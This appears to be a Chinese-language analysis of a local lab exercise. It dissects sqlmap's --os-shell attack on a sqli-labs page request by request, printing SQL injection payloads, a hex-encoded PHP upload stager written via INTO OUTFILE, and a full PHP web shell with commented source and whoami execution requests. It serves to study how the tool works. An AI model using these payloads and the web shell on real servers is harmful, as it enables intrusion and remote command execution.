本地执行完整过程
D:sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
___
__H__
___ ___[)]_____ ___ ___ {1.2.11#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:10:10
[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:wwwapacheApache24htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'desktop-ei9lgn7xscope'
os-shell>
执行以上过程在本地一共抓到22个http数据包,其中11个请求包,11个响应包,下边依次对它们进行简要分析
0x01
请求
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
此次sqlmap只进行了一次简单的 get 请求,应该是判断目标是否可达
值得注意的是这里的 User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
然后本地服务器返回了一个响应数据包,返回正常页面内容
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
0x02
请求
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
此次请求是在以下事件发生后进行的:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
此次sqlmap在参数id后加了个%5D%5B,转码后就是 [],也就是把参数以数组的形式传递给了服务端,难道是想让网站报错爆出网站路径?没看源码不是很清楚...
这次返回的响应数据与第一次返回的不同
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
0x03
请求
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d453a5c5c7777775c5c6170616368655c5c41706163686532345c5c6874646f63735c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
会发现第三次请求的参数很长,转换后如下
id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";}?>
利用mysql的 SELECT ... INTO OUTFILE ... LINES TERMINATED BY上传脚本
代码展开后如下:
<?php
if (isset($_REQUEST["upload"])){
$dir=$_REQUEST["uploadDir"];
if (phpversion()<'4.1.0'){
$file=$HTTP_POST_FILES["file"]["name"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
}
else{
$file=$_FILES["file"]["name"];
@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
}@chmod($dir."/".$file,0755);
echo "File uploaded";
}
else {
echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";
}?>
提供文件上传功能
这次返回的响应数据和第二次返回的数据完全一样
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
第四到八次请求全是用来判断文件上传到了哪里,这里请求的次数应该是跟0x02中提供的E:/www/apache/Apache24/htdocs/tmpumgnt.php路径深度有关
0x04
请求
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x05
请求
GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x06
请求
GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x07
请求
GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x08
请求
GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8
1 Dumb Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:wwwapacheApache24htdocs> <input type=submit name=upload value=upload></form>
0x09
请求
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"
E:wwwapacheApache24htdocs
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"
1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1
";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--
代码展开后:
<?php
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
$z=preg_replace('/[, ]+/',',',$z);
$z=explode(',',$z);
$z=array_map('trim',$z);
}
else{
$z=array();
}
$c=$c." 2>&1
";
function f($n){
global $z;
return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
ob_start();
system($c);
$w=ob_get_contents();
ob_end_clean();
}
elseif(f('proc_open')){
$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
$w=NULL;
while(!feof($t[1])){
$w.=fread($t[1],512);
}
@proc_close($y);
}
elseif(f('shell_exec')){
$w=shell_exec($c);
}
elseif(f('passthru')){
ob_start();
passthru($c);
$w=ob_get_contents();
ob_end_clean();
}
elseif(f('popen')){
$x=popen($c,r);
$w=NULL;
if(is_resource($x)){
while(!feof($x)){
$w.=fread($x,512);
}
}
@pclose($x);
}
elseif(f('exec')){
$w=array();
exec($c,$w);
$w=join(chr(10),$w).chr(10);
}
else{
$w=0;
}
print "<pre>".$w."</pre>";?>
该脚本先从客户请求中获取cmd的值赋值给 $c
设置脚本最大执行时间为无限
设置客户端断开连接时也不中断脚本执行
获取配置文件中禁用的函数列表赋值给 $z
如果禁用的函数列表 $z 不为空
- 把列表中的所有英文逗号或者空格全部替换为英文逗号赋值给 $z
- 然后按英文逗号分隔把该函数列表转换为数组赋值给 $z
- 去除数组中每个元素首尾的空白字符赋值给 $z
如果禁用的函数列表为空,就把 $z 初始化为空数组
然后 $c=$c." 2>&1 "
定义函数 f($n)
- 调用全局变量$z
- 如果 $n 可以被调用并且不在数组 $z 中返回true,否则返回false
如果 f('system') 为 true
- 打开输出缓冲
- 执行cmd命令 $c
- 获取缓冲区中的内容赋值给 $w
- 清除缓冲区并关闭输出缓冲
否则如果 f('proc_open') 为 true
- 好像是创建一个子进程,执行命令,然后把执行结果写入到管道中
- 从管道中读取命令的执行结果赋值给 $w
- 关闭进程资源
否则如果 f('shell_exec') 为 true
- 通过 shell 环境执行命令,将结果返回给 $w
否则如果 f('passthru') 为 true
- 打开输出缓冲
- 执行命令
- 将缓冲区的内容赋值给 $w
- 清楚缓冲区并关闭输出缓冲
否则如果 f('popen') 为 true
- 打开一个指向进程的管道,执行命令,返回一个fopen()相同的文件指针 $x
- 读取该指针所指向的资源赋值给 $w
- 关闭该资源 $x
否则如果 f('exec') 为 true
- $w 初始化为空数组
- 执行命令并将结果填充到 $w 数组中
- 将数组 $w 转换为用 chr(10) 连接的字符串
否则
- $w = 0
最后 print "<pre>".$w."</pre>"
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8
1 Dumb DumbFile uploaded
0x0a
请求
GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>command execution test
</pre>
0x0b
请求
GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>desktop-ei9lgn7xscope
</pre>